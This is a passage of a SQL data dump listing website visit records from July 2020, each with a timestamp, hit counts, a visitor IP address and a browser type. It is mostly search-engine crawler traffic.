,1,1,0,0,'88.99.172.137','chrome'),(524306,1595253362,2,2,0,0,'142.44.166.135','other'),(524307,1595253520,1,1,0,0,'66.249.70.70','chrome'),(524308,1595253646,2,2,0,0,'66.249.70.72','chrome'),(524309,1595254117,1,1,0,0,'37.73.218.36','chrome'),(524310,1595254416,1,1,0,0,'66.249.70.69','chrome'),(524311,1595254422,1,1,0,0,'178.154.200.222','other'),(524312,1595254616,8,8,0,0,'185.11.82.228','other'),(524313,1595254985,1,1,0,0,'142.44.166.135','other'),(524314,1595255185,3,3,0,0,'35.239.123.145','chrome'),(524315,1595255187,1,1,0,0,'35.239.123.145','other'),(524316,1595255523,2,2,0,0,'66.249.70.70','chrome'),(524317,1595255635,2,2,0,0,'66.249.70.72','chrome'),(524318,1595255740,1,1,0,0,'66.249.70.69','chrome'),(524319,1595255903,1,1,0,0,'142.44.166.135','other'),(524320,1595256332,1,1,0,0,'157.55.39.166','other'),(524321,1595256377,8,8,0,0,'185.11.82.228','other'),(524322,1595256851,1,1,0,0,'142.44.166.135','other'),(524323,1595257044,1,1,0,0,'66.249.70.70','chrome'),(524324,1595257223,1,1,0,0,'37.55.226.82','chrome'),(524325,1595257261,2,2,0,0,'66.249.70.72','chrome'),(524326,1595257496,1,1,0,0,'157.55.39.166','other'),(524327,1595257512,1,1,0,0,'178.208.83.57','chrome'),(524328,1595257792,1,1,0,0,'142.44.166.135','other'),(524329,1595258292,8,8,0,0,'185.11.82.228','other'),(524330,1595258294,1,1,0,0,'207.46.13.56','other'),(524331,1595258424,1,1,0,0,'192.188.46.4','chrome'),(524332,1595258678,2,2,0,0,'207.46.13.68','other'),(524333,1595258710,1,1,0,0,'66.249.70.72','chrome'),(524334,1595258763,2,2,0,0,'66.249.70.69','chrome'),(524335,1595258772,1,1,0,0,'142.44.166.135','other'),(524336,1595259309,1,1,0,0,'66.249.70.70','chrome'),(524337,1595259561,1,1,0,0,'178.154.200.222','other'),(524338,1595259807,1,1,0,0,'142.44.166.135','other'),(524339,1595260198,3,3,0,0,'66.249.70.72','chrome'),(524340,1595260303,2,2,0,0,'66.249.70.70','chrome'),(524341,1595260310,2,2,0,0,'66.249.70.69','chrome'),(524342,1595260348,8,8,0,0,'185.11.82.228','other'),(524343,1595261004,1,1,0,0,'157.55.39.166','other'),(524344,1595261259,1,1,0,0,'8.29.198.26','other'),(524345,1595261290,1,1,0,0,'8.29.198.27','other'),(524346,1595261601,3,3,0,0,'66.249.70.70','chrome'),(524347,1595261673,1,1,0,0,'207.46.13.68','other'),(524348,1595261989,1,1,0,0,'66.249.64.33','chrome'),(524349,1595262142,2,2,0,0,'78.24.179.226','chrome'),(524350,1595262147,3,3,0,0,'66.249.70.72','chrome'),(524351,1595262285,3,3,0,0,'66.249.70.69','chrome'),(524352,1595262366,8,8,0,0,'185.11.82.228','other'),(524353,1595262396,1,1,0,0,'37.120.156.26','chrome'),(524354,1595263320,1,1,0,0,'66.249.70.69','chrome'),(524355,1595263873,1,1,0,0,'207.46.13.56','other'),(524356,1595264492,1,1,0,0,'66.249.70.69','chrome'),(524357,1595264515,8,8,0,0,'185.11.82.228','other'),(524358,1595265058,1,1,0,0,'157.55.39.166','other'),(524359,1595265514,1,1,0,0,'212.1.108.150','chrome'),(524360,1595266487,3,3,0,0,'66.249.70.72','chrome'),(524361,1595266566,1,1,0,0,'66.249.64.36','chrome'),(524362,1595266615,8,8,0,0,'185.11.82.228','other'),(524363,1595266994,1,1,0,0,'66.249.64.38','chrome'),(524364,1595267225,1,1,0,0,'17.58.99.84','other'),(524365,1595267508,1,1,0,0,'66.249.70.70','chrome'),(524366,1595267783,3,3,0,0,'104.198.56.252','chrome'),(524367,1595267785,1,1,0,0,'104.198.56.252','other'),(524368,1595267920,1,1,0,0,'207.46.13.56','other'),(524369,1595267965,2,2,0,0,'66.249.70.72','chrome'),(524370,1595268259,1,1,0,0,'94.153.80.76','chrome'),(524371,1595268262,1,1,0,0,'66.249.83.223','chrome'),(524372,1595268816,8,8,0,0,'185.11.82.228','other'),(524373,1595269211,1,1,0,0,'185.98.7.182','chrome'),(524374,1595269470,1,1,0,0,'91.196.178.21','chrome'),(524375,1595269583,1,1,0,0,'66.249.70.69','chrome'),(524376,1595269740,1,1,0,0,'66.249.64.36','chrome'),(524377,1595269931,1,1,0,0,'66.249.70.70','chrome'),(524378,1595270453,1,1,0,0,'213.180.203.95','other'),(524379,1595270649,1,1,0,0,'66.249.70.69','chrome'),(524380,1595270788,1,1,0,0,'94.153.20.197','chrome'),(524381,1595270790,1,1,0,0,'66.249.83.222','chrome'),(524383,1595270982,8,8,0,0,'185.11.82.228','other'),(524384,1595271252,4,4,0,0,'204.197.254.129','chrome'),(524385,1595271861,1,1,0,0,'66.249.64.38','chrome'),(524386,1595271938,1,1,0,0,'173.252.111.2','other'),(524387,1595272091,1,1,0,0,'66.249.64.36','chrome'),(524388,1595272096,2,2,0,0,'8.29.198.26','other'),(524389,1595272111,1,1,0,0,'66.249.70.72','chrome'),(524390,1595272150,1,1,0,0,'207.46.13.68','other'),(524391,1595272982,1,1,0,0,'88.155.37.222','chrome'),(524392,1595273185,2,2,0,0,'66.249.70.70','chrome'),(524393,1595273198,8,8,0,0,'185.11.82.228','other'),(524394,1595273230,1,1,0,0,'50.62.208.184','chrome'),(524395,1595273347,1,1,0,0,'157.55.39.166','other'),(524396,1595273614,1,1,0,0,'66.249.70.69','chrome'),(524397,1595274266,1,1,0,0,'91.234.27.138','chrome'),(524398,1595274543,1,1,0,0,'5.106.15.254','other'),(524399,1595274658,3,3,0,0,'107.178.208.143','chrome'),(524400,1595274659,1,1,0,0,'107.178.208.143','other'),(524401,1595275047,1,1,0,0,'91.196.178.67','firefox'),(524402,1595275107,2,2,0,0,'66.249.64.33','chrome'),(524403,1595275213,1,1,0,0,'207.46.13.56','other'),(524404,1595275449,8,8,0,0,'185.11.82.228','other'),(524405,1595275700,1,1,0,0,'213.180.203.16','other'),(524406,1595276137,1,1,0,0,'207.46.13.68','other'),(524407,1595276892,2,2,0,0,'66.249.70.69','chrome'),(524408,1595277083,4,4,0,0,'66.249.70.70','chrome'),(524409,1595277142,2,2,0,0,'66.249.70.72','chrome'),(524410,1595277465,2,2,0,0,'77.68.27.53','chrome'),(524411,1595277542,1,1,0,0,'58.64.157.170','chrome'),(524412,1595277718,8,8,0,0,'185.11.82.228','other'),(524413,1595277822,2,2,0,0,'95.213.141.126','opera'),(524414,1595277836,3,3,0,0,'35.222.208.254','chrome'),(524415,1595277838,1,1,0,0,'35.222.208.254','other'),(524416,1595277898,1,1,0,0,'92.38.136.69','msie'),(524417,1595278362,1,1,0,0,'17.58.99.84','other'),(524418,1595278440,1,1,0,0,'66.249.64.38','chrome'),(524419,1595278930,1,1,0,0,'45.32.106.150','chrome'),(524420,1595278954,2,2,0,0,'78.46.76.29','chrome'),(524421,1595279572,1,1,0,0,'66.249.70.72','chrome'),(524422,1595280080,8,8,0,0,'185.11.82.228','other'),(524423,1595280349,2,2,0,0,'178.154.200.222','other'),(524424,1595280467,3,3,0,0,'49.0.2.26','chrome'),(524425,1595280483,1,1,0,0,'207.46.13.86','other'),(524426,1595280541,3,3,0,0,'66.249.70.70','chrome'),(524427,1595280720,2,2,0,0,'51.68.11.215','chrome'),(524428,1595281903,1,1,0,0,'66.249.70.69','chrome'),(524429,1595282328,1,1,0,0,'185.98.131.129','chrome'),(524430,1595282553,8,8,0,0,'185.11.82.228','other'),(524431,1595282655,3,3,0,0,'66.249.70.72','chrome'),(524432,1595282832,1,1,0,0,'66.249.70.69','chrome'),(524433,1595282846,1,1,0,0,'213.180.203.16','other'),(524434,1595282921,1,1,0,0,'8.29.198.27','other'),(524435,1595282960,1,1,0,0,'8.29.198.26','other'),(524436,1595283817,1,1,0,0,'47.89.29.162','chrome'),(524437,1595284070,1,1,0,0,'66.249.70.70','chrome'),(524438,1595284150,1,1,0,0,'66.249.70.72','chrome'),(524439,1595284347,4,4,0,0,'66.249.70.69','chrome'),(524440,1595284439,2,2,0,0,'66.249.64.33','chrome'),(524441,1595284768,1,1,0,0,'178.154.200.222','other'),(524442,1595284855,1,1,0,0,'207.46.13.56','other'),(524443,1595284907,1,1,0,0,'157.55.39.224','other'),(524444,1595284958,8,8,0,0,'185.11.82.228','other'),(524445,1595285341,1,1,0,0,'66.249.70.72','chrome'),(524446,1595285557,1,1,0,0,'17.58.99.84','other'),(524447,1595285687,1,1,0,0,'51.91.15.103','chrome'),(524448,1595285901,1,1,0,0,'66.249.70.70','chrome'),(524449,1595285987,1,1,0,0,'207.46.13.56','other'),(524450,1595286217,2,2,0,0,'66.249.70.69','chrome'),(524451,1595286803,2,2,0,0,'66.249.64.36','chrome'),(524452,1595286869,1,1,0,0,'91.208.99.2','chrome'),(524453,1595286978,2,2,0,0,'129.226.163.96','chrome'),(524454,1595287295,1,1,0,0,'70.32.23.31','chrome'),(524455,1595287404,8,8,0,0,'185.11.82.228','other'),(524456,1595287468,1,0,1,0,'66.249.70.72',''),(524457,1595287547,1,1,0,0,'66.249.70.72','chrome'),(524458,1595287930,1,1,0,0,'157.55.39.166','other'),(524459,1595287972,1,1,0,0,'17.58.99.84','other'),(524460,1595288002,1,1,0,0,'66.249.70.70','chrome'),(524461,1595288502,1,1,0,0,'66.249.70.69','chrome'),(524462,1595289246,1,1,0,0,'66.249.64.36','chrome'),(524463,1595289308,1,1,0,0,'62.205.134.182','other'),(524464,1595289674,2,2,0,0,'66.249.70.69','chrome'),(524465,1595289825,8,8,0,0,'185.11.82.228','other'),(524466,1595290056,1,1,0,0,'207.46.13.56','other'),(524467,1595290068,2,2,0,0,'136.243.178.154','chrome'),(524468,1595290366,2,2,0,0,'66.249.70.72','chrome'),(524469,1595290945,4,4,0,0,'66.249.70.70','chrome'),(524470,1595291452,2,2,0,0,'66.249.70.72','chrome'),(524471,1595291518,1,1,0,0,'66.249.64.36','chrome'),(524472,1595292243,1,1,0,0,'157.55.39.224','other'),(524473,1595292404,8,8,0,0,'185.11.82.228','other'),(524474,1595293112,3,3,0,0,'66.249.70.69','chrome'),(524475,1595293125,1,1,0,0,'66.249.70.70','chrome'),(524476,1595293236,1,1,0,0,'157.55.39.166','other'),(524477,1595293411,1,1,0,0,'174.136.12.84','chrome'),(524478,1595293751,2,2,0,0,'8.29.198.25','other'),(524479,1595294976,1,1,0,0,'66.249.70.72','chrome'),(524480,1595295048,1,1,0,0,'66.249.70.70','chrome'),(524481,1595295062,8,8,0,0,'185.11.82.228','other'),(524482,1595295147,3,3,0,0,'66.249.70.69','chrome'),(524483,1595295674,1,1,0,0,'34.219.37.29','chrome'),(524484,1595296300,1,1,0,0,'66.249.70.70','chrome'),(524485,1595296351,3,3,0,0,'104.197.218.162','chrome'),(524486,1595296353,1,1,0,0,'104.197.218.162','other'),(524487,1595296438,1,1,0,0,'94.131.185.243','other'),(524488,1595296682,1,1,0,0,'207.46.13.56','other'),(524489,1595296918,2,2,0,0,'66.249.70.72','chrome'),(524490,1595296931,3,3,0,0,'66.249.70.69','chrome'),(524491,1595297816,8,8,0,0,'185.11.82.228','other'),(524492,1595297920,3,3,0,0,'66.249.70.69','chrome'),(524493,1595298485,1,1,0,0,'178.154.200.222','other'),(524494,1595298617,1,1,0,0,'66.249.64.36','chrome'),(524495,1595298749,1,1,0,0,'66.249.64.33','chrome'),(524496,1595298866,1,1,0,0,'31.173.26.2','chrome'),(524497,1595298867,1,1,0,0,'66.249.70.70','chrome'),(524498,1595299555,1,1,0,0,'50.28.40.153','chrome'),(524499,1595299875,4,4,0,0,'66.249.64.36','chrome'),(524500,1595300028,1,1,0,0,'157.55.39.166','other'),(524501,1595300158,4,4,0,0,'66.249.70.72','chrome'),(524502,1595300290,3,3,0,0,'66.249.70.69','chrome'),(524503,1595300519,8,8,0,0,'185.11.82.228','other'),(524504,1595301989,2,2,0,0,'66.249.70.72','chrome'),(524505,1595302008,2,2,0,0,'66.249.70.70','chrome'),(524506,1595302048,2,2,0,0,'66.249.70.69','chrome'),(524507,1595302087,1,1,0,0,'17.58.99.84','other'),(524508,1595302107,2,2,0,0,'66.249.64.33','chrome'),(524509,1595303177,8,8,0,0,'185.11.82.228','other'),(524510,1595303336,1,1,0,0,'157.55.39.166','other'),(524511,1595303655,2,2,0,0,'66.249.70.70','chrome'),(524512,1595303760,1,1,0,0,'66.249.64.33','chrome'),(524513,1595303911,3,3,0,0,'35.194.9.11','chrome'),(524514,1595303913,1,1,0,0,'35.194.9.11','other'),(524515,1595303965,3,3,0,0,'66.249.70.69','chrome'),(524516,1595304448,1,1,0,0,'178.154.200.222','other'),(524517,1595304579,1,1,0,0,'8.29.198.26','other'),(524518,1595304618,1,1,0,0,'8.29.198.25','other'),(524519,1595304667,1,1,0,0,'87.236.20.169','chrome'),(524520,1595305064,2,2,0,0,'66.249.70.72','chrome'),(524521,1595305499,2,2,0,0,'66.249.64.38','chrome'),(524522,1595305769,2,2,0,0,'66.249.70.69','chrome'),(524523,1595305834,2,2,0,0,'88.198.177.113','chrome'),(524524,1595305943,1,1,0,0,'131.220.6.152','chrome'),(524525,1595306032,1,1,0,0,'66.249.64.36','chrome'),(524526,1595306069,8,8,0,0,'185.11.82.228','other'),(524527,1595306263,1,1,0,0,'130.204.184.227','chrome'),(524528,1595306961,1,1,0,0,'66.249.70.70','chrome'),(524529,1595307286,1,1,0,0,'62.205.134.182','other'),(524530,1595307593,1,1,0,0,'66.249.64.36','chrome'),(524531,1595307652,1,1,0,0,'66.249.64.38','chrome'),(524532,1595307666,1,1,0,0,'66.249.70.72','chrome'),(524533,1595307705,1,1,0,0,'66.249.70.69','chrome'),(524534,1595308178,1,1,0,0,'178.154.200.222','other'),(524535,1595308878,8,8,0,0,'185.11.82.228','other'),(524536,1595309173,1,1,0,0,'66.249.70.72','chrome'),(524537,1595309210,1,1,0,0,'178.154.200.220','other'),(524538,1595309259,1,1,0,0,'66.249.64.33','chrome'),(524539,1595309320,1,1,0,0,'66.249.70.69','chrome'),(524540,1595309845,1,1,0,0,'66.249.64.38','chrome'),(524541,1595309950,1,1,0,0,'185.191.204.3','chrome'),(524542,1595309995,1,1,0,0,'91.196.178.89','chrome'),(524543,1595310984,1,1,0,0,'66.249.64.33','chrome'),(524544,1595311050,1,1,0,0,'66.249.70.69','chrome'),(524545,1595311162,1,1,0,0,'66.249.70.70','chrome'),(524546,1595311169,1,1,0,0,'66.249.64.38','chrome'),(524547,1595311233,1,1,0,0,'91.196.178.86','chrome'),(524548,1595311677,1,1,0,0,'91.196.178.180','chrome'),(524549,1595311841,1,1,0,0,'66.249.70.72','chrome'),(524550,1595312107,1,1,0,0,'91.196.178.89','chrome'),(524551,1595312127,1,1,0,0,'17.58.99.84','other'),(524552,1595312146,8,8,0,0,'185.11.82.228','other'),(524553,1595312594,1,1,0,0,'31.13.127.6','other'),(524554,1595312784,1,1,0,0,'91.196.179.138','firefox'),(524555,1595312901,1,1,0,0,'66.249.64.36','chrome'),(524556,1595312960,1,1,0,0,'66.249.64.33','chrome'),(524557,1595312993,1,1,0,0,'66.249.70.70','chrome'),(524558,1595313046,1,1,0,0,'66.249.70.69','chrome'),(524559,1595313085,1,1,0,0,'66.249.64.38','chrome'),(524560,1595313191,1,1,0,0,'66.249.70.72','chrome'),(524561,1595313753,1,1,0,0,'5.45.207.70','other'),(524562,1595314620,3,3,0,0,'66.249.70.72','chrome'),(524563,1595314633,1,1,0,0,'66.249.64.38','chrome'),(524564,1595314749,1,1,0,0,'5.255.253.103','other'),(524565,1595314753,1,1,0,0,'17.58.99.84','other'),(524566,1595314843,2,2,0,0,'66.249.70.69','chrome'),(524567,1595314936,1,1,0,0,'66.249.64.33','chrome'),(524568,1595315309,8,8,0,0,'185.11.82.228','other'),(524569,1595315317,1,1,0,0,'157.55.39.166','other'),(524570,1595315411,1,1,0,0,'8.29.198.26','other'),(524571,1595315442,1,1,0,0,'8.29.198.25','other'),(524572,1595315648,1,1,0,0,'178.154.200.110','other'),(524573,1595315690,2,2,0,0,'88.99.105.216','chrome'),(524574,1595316565,1,0,1,0,'66.249.70.69',''),(524575,1595316577,1,1,0,0,'91.196.178.89','chrome'),(524576,1595316826,1,1,0,0,'66.249.64.36','chrome'),(524577,1595316970,2,2,0,0,'66.249.70.70','chrome'),(524578,1595317063,2,2,0,0,'66.249.70.69','chrome'),(524579,1595317190,3,3,0,0,'51.68.11.215','chrome'),(524580,1595317249,2,2,0,0,'51.68.11.191','chrome'),(524581,1595317352,1,1,0,0,'66.249.70.72','chrome'),(524582,1595317526,1,1,0,0,'178.154.200.175','other'),(524583,1595317530,1,1,0,0,'5.45.207.134','other'),(524584,1595317623,1,1,0,0,'66.249.64.38','chrome'),(524585,1595318166,1,1,0,0,'91.196.178.85','firefox'),(524586,1595318459,1,1,0,0,'66.249.70.72','chrome'),(524587,1595318531,1,1,0,0,'66.249.64.36','chrome'),(524588,1595318571,3,3,0,0,'66.249.70.69','chrome'),(524589,1595318584,8,8,0,0,'185.11.82.228','other'),(524590,1595318591,1,1,0,0,'66.249.64.38','chrome'),(524591,1595318711,1,0,1,0,'66.249.70.70',''),(524592,1595319532,1,1,0,0,'66.249.64.38','chrome'),(524593,1595319538,4,4,0,0,'66.249.70.70','chrome'),(524594,1595320033,1,1,0,0,'66.249.70.69','chrome'),(524595,1595320112,1,1,0,0,'178.154.200.196','other'),(524596,1595320450,1,1,0,0,'91.196.178.86','chrome'),(524597,1595320537,1,1,0,0,'91.196.178.85','firefox'),(524598,1595320640,1,1,0,0,'66.249.64.36','chrome'),(524599,1595320643,1,0,1,0,'66.249.64.33',''),(524600,1595321758,2,2,0,0,'192.254.78.66','chrome'),(524601,1595321843,3,3,0,0,'222.122.60.18','chrome'),(524602,1595321850,3,3,0,0,'66.249.70.70','chrome'),(524603,1595321988,1,1,0,0,'66.249.70.69','chrome'),(524604,1595322036,1,1,0,0,'66.249.64.33','chrome'),(524605,1595322127,2,2,0,0,'66.249.70.72','chrome'),(524606,1595322241,8,8,0,0,'185.11.82.228','other'),(524607,1595322352,1,1,0,0,'17.58.99.84','other'),(524608,1595322777,2,2,0,0,'82.221.105.125','chrome'),(524609,1595323420,1,1,0,0,'52.247.193.237','chrome'),(524610,1595323701,1,1,0,0,'66.249.70.72','chrome'),(524611,1595323720,1,1,0,0,'66.249.70.70','chrome'),(524612,1595323950,1,1,0,0,'91.196.178.141','chrome'),(524613,1595324658,1,1,0,0,'52.247.193.237','chrome'),(524614,1595324701,1,1,0,0,'3.237.37.4','chrome'),(524615,1595324711,1,1,0,0,'31.13.127.14','other'),(524616,1595324777,1,1,0,0,'207.46.13.56','other'),(524617,1595324800,5,5,0,0,'66.249.70.69','chrome'),(524618,1595325187,1,1,0,0,'91.196.178.141','chrome'),(524619,1595325307,1,1,0,0,'66.249.64.33','chrome'),(524620,1595325373,1,1,0,0,'66.249.70.72','chrome'),(524621,1595325984,1,1,0,0,'157.55.39.166','other'),(524622,1595326237,2,2,0,0,'8.29.198.25','other'),(524623,1595326424,8,8,0,0,'185.11.82.228','other'),(524624,1595327010,1,1,0,0,'52.247.193.237','chrome'),(524625,1595328060,1,1,0,0,'66.249.64.44','chrome'),(524626,1595328430,1,1,0,0,'207.46.13.56','other'),(524627,1595328732,3,3,0,0,'66.249.70.70','chrome'),(524628,1595329410,1,1,0,0,'66.249.64.38','chrome'),(524629,1595329933,1,1,0,0,'91.196.178.175','chrome'),(524630,1595330183,1,1,0,0,'178.154.200.222','other'),(524631,1595330562,1,1,0,0,'109.74.154.72','chrome'),(524632,1595331083,1,1,0,0,'66.249.64.36','chrome'),(524633,1595331116,1,1,0,0,'66.249.70.72','chrome'),(524634,1595331359,1,1,0,0,'66.249.64.44','chrome'),(524635,1595331793,1,1,0,0,'157.55.39.166','other'),(524636,1595332017,8,8,0,0,'185.11.82.228','other'),(524637,1595332288,3,3,0,0,'66.249.70.70','chrome'),(524638,1595332516,1,1,0,0,'207.46.13.56','other'),(524639,1595332591,3,3,0,0,'66.249.70.69','chrome'),(524640,1595333051,2,2,0,0,'178.208.83.57','chrome'),(524641,1595334067,1,1,0,0,'131.220.6.156','chrome'),(524642,1595334731,1,1,0,0,'66.249.70.69','chrome'),(524643,1595334790,1,1,0,0,'66.249.70.72','chrome'),(524644,1595335569,1,1,0,0,'91.196.178.89','chrome'),(524645,1595335812,1,1,0,0,'185.138.228.162','chrome'),(524646,1595336272,2,2,0,0,'66.249.70.69','chrome'),(524647,1595336504,1,1,0,0,'66.249.70.72','chrome'),(524648,1595336506,1,0,1,0,'66.249.70.70',''),(524649,1595336562,1,1,0,0,'66.249.64.38','chrome'),(524650,1595337059,1,1,0,0,'8.29.198.27','other'),(524651,1595337094,1,1,0,0,'8.29.198.26','other'),(524652,1595337143,2,2,0,0,'157.55.39.166','other'),(524653,1595337218,2,2,0,0,'51.68.11.227','chrome'),(524654,1595337256,1,1,0,0,'35.164.235.49','chrome'),(524655,1595337719,8,8,0,0,'185.11.82.228','other'),(524656,1595338143,3,3,0,0,'66.249.70.69','chrome'),(524657,1595338208,1,1,0,0,'66.249.70.70','chrome'),(524658,1595338294,1,1,0,0,'66.249.70.72','chrome'),(524659,1595338645,1,1,0,0,'51.68.11.211','chrome'),(524660,1595339232,1,1,0,0,'95.135.213.30','chrome'),(524661,1595339927,1,1,0,0,'66.249.64.36','chrome'),(524662,1595340750,1,1,0,0,'66.249.70.69','chrome'),(524663,1595340955,1,1,0,0,'207.46.13.56','other'),(524664,1595341646,1,1,0,0,'91.225.57.36','chrome'),(524665,1595341705,1,1,0,0,'66.249.64.36','chrome'),(524666,1595341918,1,1,0,0,'66.249.70.72','chrome'),(524667,1595341952,2,2,0,0,'91.208.99.2','chrome'),(524668,1595342196,1,1,0,0,'157.55.39.166','other'),(524669,1595342477,1,1,0,0,'45.76.213.227','chrome'),(524670,1595342578,1,1,0,0,'207.46.13.56','other'),(524671,1595342990,8,8,0,0,'185.11.82.228','other'),(524672,1595343107,1,1,0,0,'80.150.6.150','chrome'),(524673,1595344484,1,1,0,0,'66.249.70.69','chrome'),(524674,1595345571,1,1,0,0,'66.249.70.69','chrome'),(524675,1595345716,1,1,0,0,'66.249.64.36','chrome'),(524676,1595346312,1,1,0,0,'207.46.13.56','other'),(524677,1595346324,2,2,0,0,'176.58.124.41','chrome'),(524678,1595346507,1,1,0,0,'91.196.178.70','firefox'),(524679,1595346764,1,1,0,0,'51.68.11.215','chrome'),(524680,1595346802,2,2,0,0,'66.249.70.70','chrome'),(524681,1595347885,2,2,0,0,'8.29.198.25','other'),(524682,1595348014,1,1,0,0,'51.103.51.171','chrome'),(524683,1595348139,2,2,0,0,'66.249.70.69','chrome'),(524684,1595348797,2,2,0,0,'66.249.70.70','chrome'),(524685,1595349074,8,8,0,0,'185.11.82.228','other'),(524686,1595349232,1,1,0,0,'66.249.64.33','chrome'),(524687,1595349337,1,1,0,0,'66.249.70.72','chrome'),(524688,1595349876,1,1,0,0,'81.88.49.11','chrome'),(524689,1595349891,1,1,0,0,'27.254.140.71','chrome'),(524690,1595351004,3,2,1,0,'66.249.70.69',''),(524691,1595351098,1,1,0,0,'173.252.111.119','other'),(524692,1595351134,1,1,0,0,'173.252.111.13','other'),(524693,1595351135,1,1,0,0,'173.252.111.112','other'),(524694,1595351155,2,2,0,0,'66.249.70.70','chrome'),(524695,1595351201,2,2,0,0,'173.252.111.23','other'),(524696,1595351304,1,1,0,0,'173.252.111.9','other'),(524697,1595351328,1,1,0,0,'173.252.111.21','other'),(524698,1595352967,2,2,0,0,'66.249.70.70','chrome'),(524699,1595353027,1,1,0,0,'157.55.39.166','other'),(524700,1595353229,1,1,0,0,'66.249.64.36','chrome'),(524701,1595353355,1,1,0,0,'157.55.39.223','other'),(524702,1595353743,2,2,0,0,'66.249.70.72','chrome'),(524703,1595353777,1,0,1,0,'66.249.70.69',''),(524704,1595355248,1,1,0,0,'66.249.64.36','chrome'),(524705,1595355884,1,1,0,0,'66.249.70.72','chrome'),(524706,1595356464,8,8,0,0,'185.11.82.228','other'),(524707,1595356681,1,1,0,0,'66.249.64.33','chrome'),(524708,1595357096,1,1,0,0,'66.249.70.72','chrome'),(524709,1595357425,2,2,0,0,'66.249.70.70','chrome'),(524710,1595357700,8,8,0,0,'185.11.82.228','other'),(524711,1595357818,1,1,0,0,'157.55.39.223','other'),(524712,1595358163,1,1,0,0,'66.249.70.72','chrome'),(524713,1595358719,1,1,0,0,'8.29.198.26','other'),(524714,1595358777,1,1,0,0,'8.29.198.25','other'),(524715,1595358965,1,1,0,0,'91.196.178.114','chrome'),(524716,1595358987,8,8,0,0,'185.11.82.228','other'),(524717,1595360272,8,8,0,0,'185.11.82.228','other'),(524718,1595360745,1,1,0,0,'66.249.70.70','chrome'),(524719,1595360810,1,1,0,0,'207.46.13.56','other'),(524720,1595361126,2,2,0,0,'66.249.70.69','chrome'),(524721,1595361566,8,8,0,0,'185.11.82.228','other'),(524722,1595361706,1,1,0,0,'66.249.64.33','chrome'),(524723,1595362364,2,2,0,0,'66.249.70.72','chrome'),(524724,1595362913,8,8,0,0,'185.11.82.228','other'),(524725,1595362965,1,1,0,0,'157.55.39.223','other'),(524726,1595363655,1,1,0,0,'66.249.70.72','chrome'),(524727,1595363670,1,1,0,0,'52.178.201.217','other'),(524728,1595364278,8,8,0,0,'185.11.82.228','other'),(524729,1595364821,1,1,0,0,'66.249.70.70','chrome'),(524730,1595365367,1,1,0,0,'66.249.64.36','chrome'),(524731,1595365618,8,8,0,0,'185.11.82.228','other'),(524732,1595365874,1,1,0,0,'66.249.70.69','chrome'),(524733,1595365894,1,1,0,0,'66.249.70.70','chrome'),(524734,1595366486,1,1,0,0,'66.249.64.33','chrome'),(524735,1595366757,1,1,0,0,'157.55.39.223','other'),(524736,1595366830,1,1,0,0,'178.154.200.222','other'),(524737,1595366974,8,8,0,0,'185.11.82.228','other'),(524738,1595367198,1,1,0,0,'66.249.70.70','chrome'),(524739,1595367547,1,1,0,0,'66.249.70.72','chrome'),(524740,1595368398,8,8,0,0,'185.11.82.228','other'),(524741,1595369390,1,1,0,0,'88.155.65.71','chrome'),(524742,1595369410,2,2,0,0,'66.249.70.72','chrome'),(524743,1595369557,1,1,0,0,'8.29.198.26','other'),(524744,1595369608,1,1,0,0,'8.29.198.25','other'),(524745,1595369926,8,8,0,0,'185.11.82.228','other'),(524746,1595370346,3,3,0,0,'157.55.39.223','other'),(524747,1595370398,3,3,0,0,'66.249.70.69','chrome'),(524748,1595371501,1,1,0,0,'157.55.39.223','other'),(524749,1595371537,8,8,0,0,'185.11.82.228','other'),(524750,1595371808,2,2,0,0,'66.249.70.72','chrome'),(524751,1595372295,2,2,0,0,'66.249.70.70','chrome'),(524752,1595372637,1,1,0,0,'66.249.70.69','chrome'),(524753,1595372761,1,1,0,0,'157.55.39.223','other'),(524754,1595373022,8,8,0,0,'185.11.82.228','other'),(524755,1595373633,1,1,0,0,'207.46.13.56','other'),(524756,1595373790,2,2,0,0,'66.249.70.69','chrome'),(524757,1595373842,1,1,0,0,'66.249.64.33','chrome'),(524758,1595373974,1,1,0,0,'66.249.64.38','chrome'),(524759,1595374264,1,1,0,0,'157.55.39.223','other'),(524760,1595374668,8,8,0,0,'185.11.82.228','other'),(524761,1595374778,1,1,0,0,'178.154.200.222','other'),(524762,1595374988,1,1,0,0,'66.249.64.36','chrome'),(524763,1595375554,2,2,0,0,'66.249.70.70','chrome'),(524764,1595375561,2,2,0,0,'66.249.70.69','chrome'),(524765,1595375707,1,1,0,0,'62.205.134.182','other'),(524766,1595375917,1,1,0,0,'66.249.64.33','chrome'),(524767,1595376160,1,1,0,0,'66.249.70.72','chrome'),(524768,1595376326,8,8,0,0,'185.11.82.228','other'),(524769,1595376752,1,1,0,0,'217.171.147.164','chrome'),(524770,1595376977,1,1,0,0,'66.249.70.69','chrome'),(524771,1595377293,1,1,0,0,'66.249.70.70','chrome'),(524772,1595378256,8,8,0,0,'185.11.82.228','other'),(524773,1595378818,1,1,0,0,'213.180.203.16','other'),(524774,1595379743,1,1,0,0,'66.249.70.69','chrome'),(524775,1595379749,3,3,0,0,'66.249.70.70','chrome'),(524776,1595380263,1,1,0,0,'66.249.70.72','chrome'),(524777,1595380390,1,1,0,0,'8.29.198.25','other'),(524778,1595380439,1,1,0,0,'8.29.198.26','other'),(524779,1595380547,8,8,0,0,'185.11.82.228','other'),(524780,1595381046,1,1,0,0,'31.13.115.10','other'),(524781,1595381086,1,1,0,0,'66.249.70.70','chrome'),(524782,1595381088,1,1,0,0,'34.222.175.43','chrome'),(524783,1595381110,2,2,0,0,'207.46.13.56','other'),(524784,1595381369,2,2,0,0,'66.249.70.72','chrome'),(524785,1595381639,1,1,0,0,'66.249.64.38','chrome'),(524786,1595381668,1,1,0,0,'178.154.200.222','other'),(524787,1595381857,2,2,0,0,'66.249.70.69','chrome'),(524788,1595383289,8,8,0,0,'185.11.82.228','other'),(524789,1595383398,2,2,0,0,'66.249.70.70','chrome'),(524790,1595383562,1,1,0,0,'66.249.70.72','chrome'),(524791,1595384003,1,1,0,0,'66.249.70.69','chrome'),(524792,1595384059,1,1,0,0,'157.55.39.223','other'),(524793,1595384741,1,1,0,0,'178.154.200.216','other'),(524794,1595385327,2,2,0,0,'66.249.70.72','chrome'),(524795,1595385373,1,1,0,0,'66.249.70.70','chrome'),(524796,1595385610,1,1,0,0,'66.249.64.38','chrome'),(524797,1595386770,1,1,0,0,'66.249.70.72','chrome'),(524798,1595386821,8,8,0,0,'185.11.82.228','other'),(524799,1595387269,1,1,0,0,'157.55.39.223','other'),(524800,1595387376,1,1,0,0,'207.46.13.56','other'),(524801,1595388893,1,1,0,0,'3.128.58.81','firefox'),(524802,1595388956,2,2,0,0,'6